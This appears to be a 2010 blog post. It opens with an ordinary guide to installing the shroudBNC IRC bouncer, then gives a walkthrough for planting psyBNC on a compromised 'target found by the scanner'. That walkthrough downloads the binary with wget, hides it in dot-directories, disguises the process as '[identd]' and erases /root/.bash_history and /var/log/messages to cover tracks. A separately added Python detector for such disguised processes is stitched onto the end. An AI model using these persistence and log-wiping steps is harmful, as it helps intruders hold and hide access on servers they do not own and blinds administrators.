Monday, 04 October 2010

Bug Dork


How to Set Up ShroudBNC

How do you build or install shroudBNC, or sBNC for short? For this install guide I'm using sBNC version 1.1, and I'll also give you a link for downloading the sBNC file; or, if I get the time, I'll upload it to my own file space, hehehe . . .
OK, that's enough talking, let's get straight to it, yeah?
- Preparation
(people say that without preparation, things rarely succeed)
OK, the preparation is simple:
1. PC / laptop. Obviously: without a PC or laptop you can't install anything. If you don't have one, just go to an internet cafe; plenty of them are cheap these days, hehehe.....

2. Have some vodka or ciu ready; without a drink it's just not as good, hahaha.

3. Cigarettes. Without cigarettes this gets really tedious; you need them so you don't get a headache.

4. PuTTY. If you're on Windows, use PuTTY. It works much like a DOS prompt, except that you're on the command line of an online Linux/Unix/BSD server; we'll use it over SSH.

5. Shell. This is the really important one, because we build sBNC from a shell.
I recommend using a legal shell, but it's up to you whether you install sBNC from a hijacked shell or a legal one. If you have one, share it: send a memo to my nick or something, /ms send mamo (your shell), hahaha~~~


1. For a successful install, have a shot of that vodka first.
Then log in to your shell with PuTTY (legal shell).
2. Next, download sBNC.
You can use wget, fetch, lwp-download, or curl -f -O.
Example:
wget http://mirror.shroudbnc.info/sbnc-1.1.tar.gz
If wget isn't available, use fetch, lwp-download, or curl -f -O.
3. Once it's downloaded, extract sBNC right away.
Use: tar -zvxf sbnc-1.1.tar.gz
->> have another drink of vodka or a drag on your cigarette
4. Now go into the sBNC directory you just extracted.
Use: cd sbnc-1.1
5. Next, configure sBNC.
Type: ./configure
If configure fails, it may be because the admin of the shell you're using has disabled it.
->> have another drink of vodka or another drag on your cigarette
6. Once configuration succeeds, type: gmake
7. Then type: gmake install
->> more vodka again; if you're starting to feel it, stop for now, hahaha....
8. When that's done there will be a new directory named "sbnc", located at home/ramonez/sbnc, next to the sbnc-1.1 directory. You can type: cd .. or you can type cd ~/sbnc or cd /home/ramonez/sbnc
For those who, like me, don't know Linux commands by heart yet, I suggest just typing: cd .. followed by cd sbnc
9. Let's assume you're now in the sbnc directory.
Now type: ./conftool
You'll see something like this:
==================================================================
This utility will automatically generate a suitable configuration
for you once it has asked you some questions.
1. Which port should the bouncer listen on? [9000] <-- enter the port for sbnc here
2. What should the first user's name be? <-- enter the ident for sbnc here
3. Please enter a password for the first user: <-- you know this one: enter a password
Writing config...
==================================================================
10. Finally, run sbnc.
Just type: ./sbnc
11. So that sBNC runs as only one process, don't forget to restart sBNC; type: ./sbnc --lps
sbnc is now running, and you can test it in your favourite mIRC.
Example shell server, ident and password:
server : nama.shell.elu
port : 1234
ident : admin
passwd : sbncadmin
ircserv: irc.telkom.net.id
ircport: 6667

[19:24] * Connecting to nama.shell.elu (1234)
[19:24] -
[19:24] -Notice- *** shroudBNC1.1 $Revision: 371 $
[19:24] -
[19:24] -Notice- *** Looking up your hostname
[19:24] -
[19:24] -Notice- *** Failed to resolve your host. Using IP address instead (127.0.0.1)
You'll then get a private message from -sBNC, the same as with psyBNC, like this:
Session Start: Thu jul 02 19:24:27 2009
Session Ident: -sBNC
Session Ident: -sBNC (bouncer@shroudbnc.org)
[19:24] <-sBNC> You haven't set a server yet. Use /sbnc set server to do that now.
Reaching for the dictionary, are you? Hehehe. .
Here's the deal: it means you haven't set the IRC server yet. So how do you set the IRC server? Easy, just type /sbnc set server
Example: /sbnc set server irc.telkom.net.id 6667
If you want to use a vhost, type /sbnc set vhost
No example for that one; there are plenty on Google.
For the other commands just type: /sbnc help
Every time a setting is applied correctly, sbnc responds like this:
[19:24] <-sBNC> Done.
Now just wait for sbnc's response:
[19:32] <-sBNC> Scheduled reconnect in 120 seconds.
[19:25] set server irc.telkom.net.id 6667
[19:25] <-sBNC> Scheduled reconnect in 60 seconds.
[19:25] <-sBNC> Done.
[19:32] <-sBNC> Scheduled reconnect in 120 seconds.
[19:32] <-sBNC> You have new messages. Use '/msg -sBNC read' to view them.
[19:32] erase
[19:32] <-sBNC> Done.
Session Close: Thu Jul 02 19:33:23 2009

Now just join your favourite channel, for example: #ndolly
NB: commands don't have to be typed as /sbnc; to keep it simple, just type ' set ' in the private chat with sbnc.
I changed the shell server, port, identd and sbnc password so that you don't go trying my shell.

Short command list for installing ShroudBNC version 1.1:
1) wget http://mirror.shroudbnc.info/sbnc-1.1.tar.gz
2) tar -zvxf sbnc-1.1.tar.gz
3) cd sbnc-1.1
4) ./configure
5) gmake
6) make install
7) cd ..
8) cd sbnc
9) ./conftool
fill in the port, identd, password
10) ./sbnc
11) ./sbnc --lps
That's it, done. Hope it's useful.

How to Set Up psyBNC from a Shell/Target Found by the Scanner

mkdir "...." <<-- this is our directory; after that we go
into that directory
cd "...." <<-- enter the directory
wget wget http://www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh
tar -zxvf .sh
mv psybnc .log
cd .log
make
echo "PSYBNC.SYSTEM.PORT1=110"  >> user.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> user.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> user.conf
pwd
/home/scut/..../.log
type the command:
PATH=$PATH:/home/scut/"...."/.log
mv psybnc "[identd] "
mv scut.conf "  "
"[identd] " "  " 

 .-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
 ,----.,----.,-. ,-.,---.,--. ,-.,----.
 | O || ,-' \ \/ / | o || \| || ,--'
 | _/ _\ \ \ / | o< | |\ || |__
 |_| |____/ |__| |___||_| \_| \___|
 Version 2.2.1 (c) 1999-2000  the most psychoid  and the cool lam3rz Group IRCnet
 `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
 Configuration File:
 No logfile specified, logging to log/psybnc.log
 Listening on: 0.0.0.0 port 11111
 psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
 [scut@d11303 .log]$

 ps -x shows the processes running in the background of the shell
 [scut@d11303 .log]$ ps -x
 PID TTY STAT TIME COMMAND
 31544 ? S 0:16 ./bash
 31629 ? S 0:06 sendmail to scut
 2212 pts/1 S 0:00 -bash
 2291 pts/1 S 0:00 [identd]
 2309 pts/1 R 0:00 ps -x
 Note: 2291 pts/1 S 0:00 [identd] <<-- this is your psybnc
 background process, renamed after we applied the trick above. But
don't celebrate too soon, because the admin may become suspicious of
 the background processes on the server and go looking for it
 with:

find | grep psybnc <<-- what the admin is likely to run,
because admins usually know that users tend to run psybnc,
 and then your psybnc file names will show up:
./log/psybnc.log
./log/psybnc.log.old
./psybncchk
./psybnc.pid

So we need to rename those files
to something else, for example
[scut@d11303 .log]$ mv psybnc.pid .log
[scut@d11303 log]$ mv psybnc.log .sh
[scut@d11303 log]$ mv psybnc.log.old .mud

That way the admin probably won't be suspicious
 of the background process on the server ;)
And last, don't forget to clean your logs
by typing the commands:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
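
From the administrator's side, the renaming described above is still visible: a real kernel thread (the bracketed names in ps) has an empty /proc/PID/cmdline and no exe link, while a renamed userland binary has both, and a history file pointed at /dev/null is a symlink that can be listed. The following is an added example, not part of the original post; the function names, the two heuristics and the sample /proc tree are constructed for illustration.

```python
import os
import tempfile

def find_masquerading(proc_root="/proc"):
    """Flag userland processes named like kernel threads or run from dot-directories."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                raw = fh.read()
            exe = os.readlink(os.path.join(base, "exe"))
        except OSError:
            continue  # kernel thread (no exe link), exited, or not readable
        if not raw:
            continue  # real kernel threads have an empty cmdline
        argv0 = raw.split(b"\0", 1)[0].decode("utf-8", "replace")
        reasons = []
        name = argv0.strip()
        if name.startswith("[") and name.endswith("]"):
            reasons.append("bracketed-name")
        if any(part.startswith(".") for part in exe.split("/") if part):
            reasons.append("hidden-dir")
        if reasons:
            hits.append((int(entry), argv0, reasons))
    return sorted(hits)

def nulled_histories(paths):
    """Return history files that are symlinks to /dev/null."""
    return [p for p in paths
            if os.path.islink(p) and os.readlink(p) == "/dev/null"]

def build_sample_proc(root):
    """Constructed sample /proc tree mirroring the ps listing above."""
    sample = {
        "2212": (b"-bash\0", "/bin/bash"),
        "2291": (b"[identd] \0  \0", "/home/scut/..../.log/[identd] "),
    }
    for pid, (cmdline, exe) in sample.items():
        os.makedirs(os.path.join(root, pid))
        with open(os.path.join(root, pid, "cmdline"), "wb") as fh:
            fh.write(cmdline)
        os.symlink(exe, os.path.join(root, pid, "exe"))
    os.makedirs(os.path.join(root, "2"))  # kernel thread: empty cmdline, no exe
    open(os.path.join(root, "2", "cmdline"), "wb").close()

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_proc(tmp)
        print(find_masquerading(tmp))
```

Run against the real /proc as root so that every process's exe link is readable; the hidden-dir rule is a heuristic and will also match legitimate tools installed under dot-directories in a home directory.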